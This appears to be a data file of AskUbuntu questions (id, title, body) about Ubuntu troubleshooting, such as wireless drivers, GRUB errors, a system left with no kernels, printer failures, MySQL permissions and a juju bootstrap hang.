379198	how to move ubuntu 12.04 launcher to the right ?	i 've just upgraded from ubuntu 10.04 lts to 12.04 , and the launcher is on the left side of my monitor . this is great , except i 'm using a dual screen setup and my main monitor is the one of the right , so when i select my main monitor as the one where launcher resides in , it 's residing in the middle of my extended desktop , causing problems when i try to mouse between screens . how do i place the launcher on the right side ? thanks
379200	my networkmanager does n't work after update to 13.10	my networkmanager does n't work after update to 13.10 . no connection is shown in it : what 's the matter with it and where can i find more error information ?
379201	what do i do with this tar.gz file from broadcom for my dell 1510 wireless card ?	i just installed ubuntu 12.04 on my 5-yr-old dell netbook in hopes of replacing win xp . i know diddly about linux , but i used to be able to get through dos instructions , so i can type in a terminal . the system shows a wifi wedge , but wo n't connect to anything . i 've been reading about wireless here , and have downloaded , via xp , the 32-bit driver file from broadcom . i 'm reading their instructions , but i do n't understand . i have to compile this file ? broadcom 's instructions say : on ubuntu , you will need headers and tools . try these commands : apt-get install build-essential linux-headers-generic i opened a terminal and typed that in . i got e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory /var/lib/dpkg/ ) , are you root ? what 's all that mean ? apt-get build-dep linux i typed that in and got the same two lines . to check to see if you have this directory do this : ls /lib/modules/*uname* -r/build that gave me 7 columns of words ( folder names ? ) , some in blue , some cyan , and one white . build instructions 1 . setup the directory by untarring the proper tarball : for 64 bit : hybrid-v35_64-nodebug-pcoem-portsrc.tar.gz example : mkdir hybrid_wl cd hybrid_wl i managed to make the directory and to change directory ( dos commands ! ) . i also managed with the desktop file manager to move the tarball to the hybrid_wl folder so it would be easy to get at . but i stopped there as the earlier command responses seem to mean that something 's missing . tar xzf < path > /hybrid-v35-nodebug-pcoem-portsrc.tar.gz or < path > /hybrid-v35_64-nodebug-pcoem-portsrc.tar.gz 2 . build the driver as a linux loadable kernel module ( lkm ) : make clean ( optional ) make when the build completes , it will produce a wl.ko file in the top level directory . if your driver does not build , check to make sure you have installed the kernel package described in the requirements above . i thought root was like win admin . i 'm the only user . i must be root , right ? what 's up with root and permission denied ? how do i get past or fix that ? also , when i was using the folder app to move the tarball , i right-clicked it out of habit , and discovered there are both an archive manager and an archive mounter with which i could open it . if i use one of those can i skip all the rest of this ? i 'm sorry if this is hard to read . your formatting controls are none i 've encountered on a website before . linux , perhaps ? and i 've no clue why some text is wrapping and some is n't .
379202	what is the matter with medibuntu ppa for 12.04 ?	w : failed to fetch http : //packages.medibuntu.org/dists/precise/release.gpg something wicked happened resolving 'packages.medibuntu.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //packages.medibuntu.org/dists/precise/free/binary-amd64/packages something wicked happened resolving 'packages.medibuntu.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //packages.medibuntu.org/dists/precise/non-free/binary-amd64/packages something wicked happened resolving 'packages.medibuntu.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //packages.medibuntu.org/dists/precise/free/binary-i386/packages something wicked happened resolving 'packages.medibuntu.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //packages.medibuntu.org/dists/precise/non-free/binary-i386/packages something wicked happened resolving 'packages.medibuntu.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //packages.medibuntu.org/dists/precise/free/i18n/translation-en_us something wicked happened resolving 'packages.medibuntu.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //packages.medibuntu.org/dists/precise/free/i18n/translation-en something wicked happened resolving 'packages.medibuntu.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //packages.medibuntu.org/dists/precise/non-free/i18n/translation-en_us something wicked happened resolving 'packages.medibuntu.org : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //packages.medibuntu.org/dists/precise/non-free/i18n/translation-en something wicked happened resolving 'packages.medibuntu.org : http ' ( -5 - no address associated with hostname ) e : some index files failed to download . they have been ignored , or old ones used instead . what about yours ? i use medibuntu ppa in 12.04 amd64 . thanks
379204	recover files from ubuntu live usb without booting	i have a persistent ubuntu live usb flash drive that fails to boot . how can i recover data that was saved on the drive ? i can still mount the drive without booting . the drive contains a file called `` casper-rw '' , and my guess is that the data is stored there . if so , is there a program i can use to read casper-rw ? thanks
379205	installing programs in root vs home partitions ?	i 'm a new linux user and a windows convert . i tried ubuntu ( dapper drake ) a few years ago and liked it quite a bit , and i 'm in the process of installing xubuntu 13.10 along side windows7 on my brand new ssd ! at this point , windows is still being installed because i need it to be , but linux is getting installed because i want to use it ! i 've done quite a bit of research and i 've toyed around with linux before , but i 'm still a newbie and i have a few questions concerning partitions and program installations.. my new ssd is n't huge ( 120gb samsung 840 evo ) , and i 'll be using my old 800gb hdd as a secondary drive . the thing is , i plan on using linux as much as possible ; only switching over to windows7 when i absolutely need to . because of this , i 'll be doing a 50:50 split of my ssd for each os ( 60gb for linux , 60gb for windows ) . i 'm also planning on splitting my old , 800gb hdd into 3 partitions : some space for extra linux programs , some space for extra windows programs , and then a shared ntfs partition for all of my data ( music , videos , documents , etc. ) . so to sum up my space situation : ~60gb ssd + 200gb hdd for linux.. ~60gb ssd + 200gb hdd for windows.. ~400gb shared ntfs.. this leads me to my questions.. while i have a fairly good idea of how my windows setup will work ( 60gb c : drive , 200gb d : drive , etc . ) , the unix/linux directory structure is still very new to me and is making this process a little bit confusing . i know that it 's possible ( and common ) to partition your `` / '' directory and `` home '' directory separately , and - as i understand it - the `` / '' partition is meant to contain system specific programs and data , while the `` home '' partition contains the programs and data of the various users . however , i 've also heard that most ( if not all ) of the programs that you install from repositories using apt are installed into the `` / '' directory . as someone who works with music/art programs and plays games ( which can take up a lot of space ) , this leads me to believe that i 'll need a large `` / '' partition ! i 've also read ( from here : http : //www.control-escape.com/linux/lx-partition.html ) that the `` home '' directory is `` the place where all the user-specific files , your data in other words , are stored . it is roughly equivalent to the âmy documentsâ folder on a ms windows desktop '' . but , as i mentioned above , i intend to keep all of my non-os-specific data ( music , documents , videos , etc . ) on my ~400gb shared partition , anyway . this really leads me to believe that i do n't need a big home partition at all and that i should focus on partitioning as much space as possible for `` / '' . and still , i 've heard other people claim that you only need around 10gb of space for your root partition ! ? edit : also , i just found out that programs like steam and wine take up space inside the `` home '' directory . so , what should i do ? i basically have 60gb ssd and 200gb hdd space for holding nothing but linux programs . all of my data will be going onto my 400gb shared ntfs partition , so is it even worth making separate partitions for `` / '' and `` home '' ? if i install both root and home on my 60gb ssd , how can i also use the extra 200gb of hdd space for more linux programs ? can i expand root across multiple drives somehow , or maybe have a symlink or something that connects the two drives together ? as i said before , i 'm still a major linux newbie , so there may be something that i 've completely misunderstood or overlooked . as someone who does a lot of art/music creation and gaming on my pc , i tend to use up a lot of program space quite quickly , especially since games and music libraries just keep getting bigger and bigger every year ! thanks for the help , i 'm looking forward to learning more about linux ! : ]
379206	world of warcraft stopped downloading ubuntu 13.10	i found out how to get wow running on ubuntu using wine 1.5 and am able to play it ( albeit somewhat slow , but that 's mostly due to my hardware ) . it was downloading just fine and i could play without any errors . but now that it has reached 85.5 % . it refuses to download any more . it was stopped at 84.5 but i reloaded the launcher multiple times and it moved another 1 % . i do n't know why it stopped ; the only thing i did was close the launcher to resume it later ( which had n't caused problems until 84.5 % downloaded ) . everything loads and it seems like it is just lagging ( the download speed wont show up and start downloading the game again ) . anyone know what i can do ? ( not using dual-boot with windows , just straight ubuntu )
379207	virtual box guest addition breaks after kernel upgrade	i have an ubuntu box installed over virtualbox with windows 7 as host . i installed guest additions in it and was working perfectly as expected . suddenly , one day virtualbox complained that guest additions are not installed ( possibly after an upgrade ) . i had to reinstall guest additions all the way again . is this because of kernel upgrades from ubuntu ? a new kernel needs a reinstall of guest addition ?
379208	mouse pointer dissappears after login ... ?	i 'm using ubuntu 13.10 where in the problem arises that whenever i log into my account the mouse pointer disappears and i have to logout and again login so anyone can state the solution for it
379213	why is my brother dcp-7055 not printing in ubuntu 13.10 ?	i upgraded from ubuntu 12.04 lts to 13.10 . actually , it was a new installation ( i reformatted the drives before installing 13.10 ) . everything seems nice and new . i installed my brother dcp-7055 printer/copier/scanner machine properly . the os recognized the printer , it is listed with the lsusb command and i was even able to access it from my browser , through the url : localhost:631/printers/ . then , when i clicked print test page , it was n't printing . i thought it was just taking longer , but ten minutes later , nothing happened . my printer even has already gone into deep sleep , and still nothing . so , i assumed it really wo n't print . the machine 's scanner feature was tested and worked well , by the way , with simple scan . it worked well with 12.04 lts . it will just be sad to downgrade to it . so what 's wrong with it ? how can i fix it ?
379215	mount ntfs partition in ubuntu -- i have completely un-installed windows	i had completely uninstalled windows 7 and then installed ubuntu 12.04 . one of my voulme is not mounted/ accessible in ubuntu . it says remove_hiberfile . how to remove it and
379216	how to get ubuntu for tablet ( or fablet ) and how to get the list of tablets compatible with that os ?	how to get ubuntu for tablet and how to have the tablet compatible with that os ? thanks regards eric perottet
379217	how do i recover my information ?	i do not remember which email address i used and the password i used when i downloaded ubuntu a few years back . how can i recover this information ? thank you .
379221	network configuration	there is a 'add ' button mentioned in the picture . how is a new local ip address used when i add it under the same connection name ?
379222	how do i see what ppa or ppas are installed or in use	sometimes i install good guy ppas because someone on askubuntu says to use add-apt-repository . later i wonder , where have they gone ? where can i find a list of personal package archives that are trusted ? shell solutions preferred , but gui solutions still useful . i found /var/lib/apt/lists , which is a start . see also related , what are the security risks in leaving trusted ppas in place ? are ppa 's safe to add to my system and what are some `` red flags '' to watch out for ? ( thanks @ lostinbrittany ) is there any guarantee that software from launchpad ppas is free from viruses and backdoor threats ?
379223	how do i get /proc/fs/cifs/stats on 12.04.3 ( cifsiostat not working ) ?	cifsiostat ( from sysstat ) does not work for me on 12.04.3 . most likely due to the fact that /proc/fs/cifs/stats does not exist . all the other files expected there exist : ➜ ~ ls -l /proc/fs/cifs total 0 -r -- r -- r -- 1 root root 0 nov 19 07:06 cifsfyi -r -- r -- r -- 1 root root 0 nov 19 07:06 debugdata -r -- r -- r -- 1 root root 0 nov 19 07:06 linuxextensionsenabled -r -- r -- r -- 1 root root 0 nov 19 07:06 lookupcacheenabled -r -- r -- r -- 1 root root 0 nov 19 07:06 multiusermount -r -- r -- r -- 1 root root 0 nov 19 07:06 oplockenabled -r -- r -- r -- 1 root root 0 nov 19 07:06 securityflags -r -- r -- r -- 1 root root 0 nov 19 07:06 tracesmb ➜ ~ ➜ ~ modinfo cifs filename : /lib/modules/3.2.0-56-generic/kernel/fs/cifs/cifs.ko version : 1.76 description : vfs to access servers complying with the snia cifs specification e.g . samba and windows license : gpl author : steve french < sfrench @ us.ibm.com > srcversion : f2e35b42511c56e4013377f depends : intree : y vermagic : 3.2.0-56-generic smp mod_unload modversions parm : cifsmaxbufsize : network buffer size ( not including header ) . default : 16384 range : 8192 to 130048 ( int ) parm : cifs_min_rcv : network buffers in pool . default : 4 range : 1 to 64 ( int ) parm : cifs_min_small : small network buffers in pool . default : 30 range : 2 to 256 ( int ) parm : cifs_max_pending : simultaneous requests to server . default : 32767 range : 2 to 32767 . ( int ) parm : echo_retries : number of echo attempts before giving up and reconnecting server . default : 5 . 0 means never reconnect . ( ushort ) parm : enable_oplocks : enable or disable oplocks ( bool ) . default : y/y/1 ( bool ) ➜ ~ what needs to be done to get cifsiostat working on 12.04.03 ?
379225	does the terminal store data ?	this is something that i have wanted to know for a really long time , but never came around to actually posing a question . i know that in the terminal that is provided in linux distros , the entire history of commands can be seen by using the arrow keys ( if there is any other method , i 'm not aware of it ) , so how does this happen ? is there someplace where the terminal logs all the keystrokes ? is it some sort of buffer ? but , then again , if it was a buffer , it would be cleared out after a while , would it not ? how does this system work ?
379229	920828 - how to open and build a vs2010 solution in precise ?	is it possible to open a vs2010 solution in an ide environment and build it and get the same output in ubuntu ? i mean pressing f5 runs the program ( maybe via wine ) in the same way ? i do n't mean .net or c # . the projects in the solution are all pure native c++ .
379230	installing ubuntu with windows 8 , which was not pre installed	my pc came pre installed with windows 7 . since then i have upgraded to win 8 64bit . can i use the ubuntu windows installer to dual boot both operating systems ?
379232	cd/dvd drive not responding	i 'm currently running 13.10 , which is incredibly more responsive than other operating systems i 've used . however , i 'm having trouble with my dvd drive ( tsst-t633a ) . bios recognizes the drive , and it functions in other operating systems , but it is n't reading any media , or showing itself in 'devices ' in my file system in ubuntu . i 've checked the additional drivers section in software updates . i added vlc using : sudo apt-get install vlc browser-plugin-vlc i tried : sudo apt-get install libavcodec-extra-53 added ubuntu restricted extras sudo apt-get install ubuntu-restricted-extras and i also tried : sudo /usr/share/doc/libdvdread4/install-css.sh i 'm not sure what else to try . any suggestions ?
379236	wifi switch amber ( off ) no matter what i do : centos ( rpm based linux ) w/ bcm4311 as wlan0	the wifi switch is permanently off in my hp dv6604nr in my linux partition . this laptop is peculiar- wifi remains off by default until after windows 7 boots . then it turns on after os is loaded . bios has no options to keep wi-fi on . its a bcm4311 wlan card . from what is known 3 methods exist to turn it on / enable wlan -- use broadcoms native stack : has some limitations including absensce of monitor mode -- use ndiswrapper : last choice -- b43 drivers i choose # 3 . i followed this to a t sudo b43-fwcutter -w /lib/firmware/ wl_apsta_mimo.o after downloading broadcom-wl-4.150.10.5.tar.bz2\ sudo rmmod b43 modprobe b43 earlier the wlan card was not listed now i can see it rfkill unblock all [ admin @ localhost ~ ] $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : yes iwconfig wlan0 wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off more cat /etc/modprobe.d/* ... /* last line .no blacklisted brm exists */ options b43 nohwcrypt=1 qos=0 i am still stuck - i cant get the wlan to turn on . its always amber instead of blue , toggling the switching l-r - no effect . pl tell me how to get wi-fi working using b43 drivers and keep turned on the wlan switch like in my windows 7 partition
379242	accidentally uninstalled all kernels	i 'm running the ubuntu 12.04 lts lamp server . i got an error stating that my root directory was full after running an apt-get dist-upgrade , so following the instructions i found online , i uninstalled some of the old kernels using apt-get . however , i somehow accidentally uninstalled all of the kernels . my system wo n't reboot now . i found a thread from 2011 about resolving this issue how to restore a system after accidentally removing all kernels ? but when i try to follow the instructions , they do n't work for me . when i do this : sudo parted -l i get this : model : ata wdc wd20ezrx-00d ( scsi ) disk /dev/sda : 2000gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 256mb 255mb primary ext2 boot 2 257mb 2000gb 2000gb extended 5 257mb 2000gb 2000gb logical lvm warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! i do n't understand why partition 1 is ext2 since this was a fresh install of 12.04 lts , but i did this command as instructed : sudo mount /dev/sda1 /mnt then i tried this command : sudo mount -- bind /dev /mnt/dev and it said it could n't find the mount point . so , i did this : mkdir /mnt/dev and then it did the mount . okay , so now i 'm ready for chroot per the instructions : sudo chroot /mnt and i get this : chroot : failed to run command '/bin/bash ' : no such file or directory i apologize in advance , but i do n't know enough about linux to figure out what 's going on here . could someone please help me ? it will take me a long time to reinstall everything on my server . update : thanks for your answer . when i enter sudo pvs i get : pv vg fmt attr psize pfree /dev/sda5 hop-server lvm2 a- 1.82t 136.00m then , i enter sudo lvdisplay /dev/hop-server and get this : -- - logical volume -- - lv name /dev/hop-server/root vg name hop-server lv uuid feusju-hfhi-wfre-322j-slwf-0j1k-zpitqx lv write access read/write lv status not available lv size 1.81 tib current le 474993 segments 1 allocation inherit read ahead sectors auto -- - logical volume -- - lv name /dev/hop-server/swap_1 vg name hop-server lv uuid tujsfw-eku4-oeli-a934-srj2-da2l-vqztyr lv write access read/write lv status not available lv size 7.20 gib current le 1843 segments 1 allocation inherit read ahead sectors auto that 's slightly different from your example , but i presume that i should enter sudo mount /dev/hop-server/root /mnt **updated** but when i do , i get this : mount : special device /dev/hop-server/root does not exist *update : * i used this web page to help me mount the file system partition : http : //linuxwave.blogspot.com/2007/11/mounting-lvm-disk-using-ubuntu-livecd.html after that , i was able to follow the rest of the original instructions with no errors . however , when i reboot , the only options are to start two versions of the memory test utility . i rebooted the live cd again and followed the instructions again . when i got to the apt-get for the kernel , it said that it 's up to date . update : okay , i mounted the partitions again , and i can see that in /root is a file named initrd.img-3.2.0-56-generic . iirc , that 's the latest kernel . i ran update-grub , but it gives me the error , `` can not find a device for / '' . update : after another search , i found this : http : //sourceforge.net/apps/mediawiki/bootinfoscript/index.php ? title=boot_problems : cannot_find_a_device_for_boot/grub i followed that procedure , and it did n't get any errors . however , now when i boot , i get this : error : elf header smaller than expected grub rescue >
379244	boot another os from terminal	i am running ubuntu 13.10.i had another two os 's installed on my hdd . avinash @ avinash-lenovo-ideapad-z500 : ~ $ sudo os-prober /dev/sda1 : windows 8 ( loader ) : windows : chain /dev/sda8 : ubuntu 13.04 ( 13.04 ) : ubuntu : linux my grub menu shows all the three os 's on startup.i do n't had any problem with booting . my question : is it possible to directly boot into /dev/sda8 : ubuntu ( 13.04 ) os , by applying some commands on ubuntu 13.10 terminal or using any other softwares . ( without showing grub menu on startup )
379254	do you want to run or display contents ? : asked after run chmod -r	i was getting a strange errno : :eacces error permission denied when i tried to upload photos . then i ran sudo chmod -r 777 /home/user/projects/myapp/ on a rails project.this command did not solve my problem and now every time when i open a file i get prompted : do you want to run designers.js.coffee , or display its contents ? how can i make this go away ?
379255	grub-update error	i get this once typing sudo update-grub : $ sudo update-grub error : syntax error . error : incorrect command . error : syntax error . syntax error at line 261 syntax errors are detected in generated grub config file . ensure that there are no errors in /etc/default/grub and /etc/grub.d/* files or please file a bug report with /boot/grub/grub.cfg.new file attached . done contents of /etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' grub_gfxmode=1366x768 can someone please shed some light on this , i am new to ubuntu and having problems .
379256	some fonts seem to be missing using xboard	i recently installed a chess program called xboard . i tried to open it from the terminal and it gave me the following error . dineshkumar @ dineshkumar-desktop : ~ $ xboard xboard : no fonts match pattern -*-helvetica-bold-r-normal -- *-*-*-*-*-*-*-* some fonts seem to be missing in your system , you should install either xfonts-100dpi or xfonts-75dpi and then restart xorg to get xboard running . see http : //bugs.debian.org/504077 and http : //bugs.debian.org/562726 for more information . what does this means and how do i rectify it and run xboard ?
379261	how to revert ubuntu 13.10 icons	i installed an icon pack and wish to revert back to the original icon pack . how do you revert to the original pack ?
379268	how to type japanese 限 ( きり ) with scim-anthy ?	i use scim-anthy to type japanese , but some kanji words i ca n't type , like 限 ( きり ) . and same with ibus . how can i update all kanji type to kasumi ? sorry for my bad english . thanks for helping .
379271	gnome terminal menu is not viewable in ltsp client	i am building lstp server and client in ubuntu 12.04 . when the client boots from lstp , it had some display problem ( like : blur display after logged in ) due to the unavailability of graphics in thin client . so , i checked in internet . then , i added the below configuration in lts.conf . ldm_session= '' gnome-session -- session=ubuntu-2d '' configure_fstab=false hostname= '' client4 '' fstab_1= '' 192.168.11.25 : /home /home nfs defaults , rw , nolock 0 0 '' then , i am able to logged in and it works fine . now the problem is , after i opened gnome-terminal , i am not able to tab ( alt + tab ) to some other application which is running . terminal is always in front . i mean , when i press tab the next application should be visible and terminal should go back . but , it is not working . after i closed the terminal , then tab ( alt + tab ) is working fine to switch over to other applications . another problems is , if i click the file menus in terminal menu bar , it is not viewable . but , still it is accessible . if i blindly click any menu items ( like : opening a new tab ) , it is opening . how can i fix those issues ? whether is it graphics/gnome related issue ? note : if i boot a thin client which is having in-built graphics , then the above issues are not happening .
379274	execution from browser failed	following is not working in amazon cloud dedicated server but in my local serve under ubuntu its working . < ? php $ retval = 0 ; $ cmd = `` python xlsx2csv.py claim_2.xlsx claim.csv '' ; echo `` < br / > \n '' ; $ last_line = system ( $ cmd , $ retval ) ; echo $ retval ; exit ; ? > but following from command line is working in my local and amazone also $ python xlsx2csv.py claim_2.xlsx claim.csv why is that ?
379276	ubuntu logo is not appearing during boot and shutdown	ubuntu is cool but not if you donât know what went wrong . recently i made some changes which caused the ubuntu logo to disappear ( symbol with circle animation ) . the logo doesnât appear anymore while booting or shutting down . the only thing which appear on booting and shutdown is 4 dots which change color ( red & white ) . i have no idea of what i possibly could have done wrong . here are my questions : what is the main reason of such problem ? can i undo the changes and put the logo back ?
379281	routing and ip setup	i have recently messed up my network in the attempt to connect two computers using network cards so that comp1 has an access to the internet directly and comp2 uses the comp1 to do the same thing . general scheme is this : comp2 ( eth0 ) - > comp1 ( eth1 ) comp1 ( eth0 ) - > switch - > network i mixed up comp1 and com2 ( thnx jos ) my interfaces look like this : comp1 : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet static address 10.10.0.10 netmask 255.255.255.0 up/sbin/iptables -t nat -a postrouting -s 10.0.0.0/24 -d 0/0 -j masquerade comp2 : auto eth0 iface eth0 inet static address 10.10.0.20 netmask 255.255.255.0 gateway 10.10.0.10 computers see each other . comp1 can see outside network : ping 8.8.8.8 works . as does comp2 . but when i try to download stuff on comp2 i get error : sudo aptitude install geany err http : // ... . temporary failure resulting security.ubuntu.com could someone pleas help me setup this last bit ? ? my original question is here i apologize is this is considered spamming or something negative
379283	owncloud installation	so i am trying to get owncloud on my ubuntu virtual machine . i got to this site : http : //software.opensuse.org/download/package ? project=isv : owncloud : community & package=owncloud and i tried to run the command : echo 'deb http : //download.opensuse.org/repositories/isv : owncloud : community/xubuntu_13.10/ / ' > > /etc/apt/sources.list.d/owncloud.list and after that i ran the command : apt-get update after the update i get an error : so the link does n't work or what ? what am i doing wrong here or is the link outdated ? how do i fix this ?
379285	a free download manager for ubuntu 12.04	i want a free download manager ( not through crossover or any other software ) which has capability to pause/resume the download and which has less chances of crashing the file which is being downloaded . also , it must have a good gui
379287	run a script at startup before login	i want to find out how to run a script made by me at startup before login .
379289	is there any lightweight appdriven window manager ?	i 've recently installed lubuntu on my cubbietruck board and it 's great in terms of ressource usage , but i 'm just addicted now to a ux where you switch between apps , not windows . like on macosx or normal ubuntu unity , when you switch between tasks wih alt + tab , you switch between apps and then between windows and there is also no window preview for every opened window on your dock , but only for the opened apps . is there any lightweight window manager with that application driven paradigm and not that document oriented paradigm from the 90 's ? or would just installing cairo dock with xcompmgr do the trick on any of them ( xfce , lxde , enlightend ) ?
379291	problem with installing intel-linux-graphics-installer_1.0.2-0intel3_i386.deb	i have ubuntu 13.10 installed . when i try to install intel-linux-graphics-installer_1.0.2-0intel3_i386.deb i have error : dependency is not satisfiable libpackagekit-glib2-14 why this happens ?
379293	impossible to unmount a truecrypt partition after accessing it via samba	i am using a true-crypt partition , which is mounted inside a samba share . this works as expected , until i access a folder inside the archive from windows via samba . after this it 's impossible to unmount the partition even after rebooting the windows machine ( and closing everything accessing that partition on the host machine too ) . currently my only recourse is to reboot the host machine . does anyone know what might be going on ?
379294	how to permanently set the screen brightness level in ubuntu 12.04 on vaio e-series laptop ?	i have ubuntu 12.04 lts running on my sony vaio e-series ( vpceb44en ) . i have followed the post how to permanently set screen brightness level in ubuntu 12.04 on dell vostro 2420 laptop ? on howto address the issue . it did n't work in my case as after reboot the screen brightness goes to default maximum . even tried with third party xbacklight , did n't work either . i have radeon hd5470 card on my machine .
379296	is there a way to open an appliction from internet browser ?	i just wonder when i visit apps.ubuntu.com that when i click the banner available on the software center , it opens the application software center . i just want to know what is the url for a specific application to it to be opened with internet browser ? so does an application in ubuntu has a ip address ?
379298	wacom intuos2 tablet not sendng events on ubuntu 12.04	i am trying to use a wacom intuos2 4x5 pen tablet on ubuntu 12.04 . the device shows up in lsusb , and in evtest . however , evtest reports no events being generated when i use the tablet , and of course higher functionality does n't work either ( mouse moving , inkscape ) . does anyone know what to try next ? has anyone successfully used intuos2 tablets on ubuntu 12.04 ? model number : xs-0405-u kernel version : 3.2.0-55-lowlatency i have the following packages installed : i libwacom-common - wacom model feature query library ( common i libwacom-dev - wacom model feature query library ( develop i a libwacom2 ( version 0.4-1ubuntu1 ) - wacom model feature query library i xserver-xorg-input-wacom - x.org x server -- wacom input driver update : i verified that the tablet works on a mac . update : the device shows up in xinput -- list as well . xinput reports `` 0.0000 '' for all `` valuators '' associated with the `` cursor '' id .
379299	how can i install ubuntu using usb startup disk creator	i have ubuntu-9.04 version . i am supposed to install a newer version of ubuntu . for that i downloaded ubuntu-12.04 , but when i install this version using usb startup disk creator and put it in usb and restart the pc and start to boot with usb it does not work . how should i proceed ?
379303	how to chance color of calendar date in indicator applet	i am dissatisfied with the date time calendar in the indicator applet for gnome classic as it does n't show the current date in a different color . i want it to look like the calendar of my android phone , today circled or in a diffferent color . anybody knows how i can do that ?
379310	why is my computer running slow on vmware 8 it has ubuntu 13 running on it . ?	my laptop asus a43e with 6gb ram , upgradable . it has vmware workstation 8 running , win7 . and i do n't understand why my ubuntu is so slow that i ca n't even do a task via vmware . it has wired lan . what can i do ? backtrack os runs great on it . ubuntu is the one which is slow . 2048gb add for ubuntu to run on vmware , any help appreciated .
379311	how can i optimize ubuntu for minimal energy usage ?	how can i optimize ubuntu for minimal energy usage ? i use my laptop for development , but also for writing . i have a 9 hour flight coming up and a 6 hour battery life when already using limited screen brightness no usb devices no networking bumblebee installed and the nvidia card switched off tlp set on powersave how can i now increase my battery life knowing that i only want to write ( using libreoffice ) ? i essentially want a very minimal system for a sort of 'writing mode . ' should i limit my quadcore to one core ? should i disable some services ? here is the list of service -- status-all [ + ] acpid [ + ] anacron [ + ] apache2 [ - ] apparmor [ ? ] apport [ + ] atd [ + ] avahi-daemon [ ? ] binfmt-support [ + ] bluetooth [ - ] brltty [ + ] bumblebeed [ + ] console-font [ + ] console-setup [ + ] cron [ + ] cups [ + ] cups-browsed [ - ] dbus [ ? ] dns-clean [ - ] elasticsearch [ - ] fancontrol [ + ] friendly-recovery [ - ] grub-common [ ? ] irqbalance [ - ] kerneloops [ ? ] killprocs [ + ] kmod [ ? ] lightdm [ - ] lighttpd [ - ] lm-sensors [ ? ] mysql [ ? ] networking [ + ] nmbd [ ? ] ondemand [ - ] openvpn [ + ] postgresql [ ? ] pppd-dns [ + ] prey-trigger [ - ] procps [ - ] pulseaudio [ ? ] rc.local [ + ] resolvconf [ + ] rfkill-restore [ + ] rfkill-store [ - ] rsync [ + ] rsyslog [ + ] samba [ + ] saned [ - ] selfcontrol [ ? ] sendsigs [ + ] setvtrgb [ - ] smartmontools [ + ] smbd [ ? ] speech-dispatcher [ - ] sudo [ - ] timidity [ ? ] tlp [ - ] udev [ ? ] umountfs [ ? ] umountnfs.sh [ ? ] umountroot [ - ] unattended-upgrades [ - ] urandom [ + ] winbind [ - ] x11-common should install a more lightweight desktop environment ? can i do this in a nice and clean way ( after all i have my laptop nicely set up and do not want to have to reinstall before 14.04 ) . should i do something else ? one last thing : i would like to activate or deactivate all these options with one script ( which i will run only when working on battery ) . please be as kind as to include suggestions on how to do what you suggest . ps : the info in some of the possible duplicates is dated for 13.10 .
379315	website ca n't connect to my server	i have create a user in mysql with this options : create user 'useruser ' @ 'localhost ' identified by 'passpass ' ; grant all privileges on * . * to 'useruser ' @ 'localhost ' with grant option ; then i want my website to select , insert , update i run this : grant select , insert , update on databasename.table to 'useruser ' @ 'mywebsiteip ' ; show grants for 'useruser ' @ 'mywebsiteip ' ; and its ok but my website still ca n't connect . yes webserver running on different pc
379321	how can i install unetbootin	i have ubuntu-9.04 and i would like to install a newer release . some people have suggested that i install unetbootin to do this . however , when i download it , i get a .exe file and ubuntu will not run such files . how can i install unetbootin ?
379322	libjpeg-turbo-dev undefined reference and package issue	i am trying to do some coding using the lib but i can not even compile a simple code , and when i asked about it in help section for the developers i got that the issue is from the package on the system which is ubuntu . i have ubuntu 13.10 64bit version and here is the simple code : # include < stdlib.h > # include < stdio.h > # include < jpeglib.h > int main ( void ) { struct jpeg_decompress_struct cinfo ; struct jpeg_error_mgr jerr ; cinfo.err = jpeg_std_error ( & jerr ) ; jpeg_create_decompress ( & cinfo ) ; return 0 ; } and here is the error i got . this same code works well as reported to me undefined reference to jpeg_createdecompress ( ) error when using libjpeg
379325	jujud hangs when connecting to the mongo : may be tls handshake error	juju bootstrap will create instances through my private cloud ( openstack ) , and run some command just like install mongo , jujud bootstrap , it will appears this : 2013-11-19 11:27:32 debug juju.agent agent.go:442 initializing address [ localhost:27017 ] 2013-11-19 11:27:32 info juju.state open.go:68 opening state ; mongo addresses : [ `` localhost:27017 '' ] ; entity `` '' and did n't do anything any more . i hook the code and found the deadloop occurs in the function tls.handshake . any one knows how to deal with it ? here is my environment.ymal default : openstack environments : # # https : //juju.ubuntu.com/get-started/openstack/ openstack : type : openstack admin-secret : dcf35222cf147ff2671658aa153a1ecf control-bucket : juju-openstack-25a4a752eeeb093324743335884df7b3 auth-url : `` http : //xx.xx.xxx.xxx:5000/v2.0/ '' # override if your workstation is running a different series to which you are deploying # default-series : precise # the following are used for userpass authentication ( the default ) auth-mode : userpass # usually set via the env variable os_username , but can be specified here username : admin # usually set via the env variable os_password , but can be specified here password : 